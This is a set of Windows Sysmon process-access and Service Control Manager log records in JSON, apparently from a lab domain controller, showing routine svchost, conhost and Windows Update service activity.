{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010362F0B00}\r\nSourceProcessId: 4684\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010A12C0B00}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010362F0B00}","SourceProcessId":"4684","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010A12C0B00}","TargetProcessId":"3344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A5B80000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A5B80000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76860,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
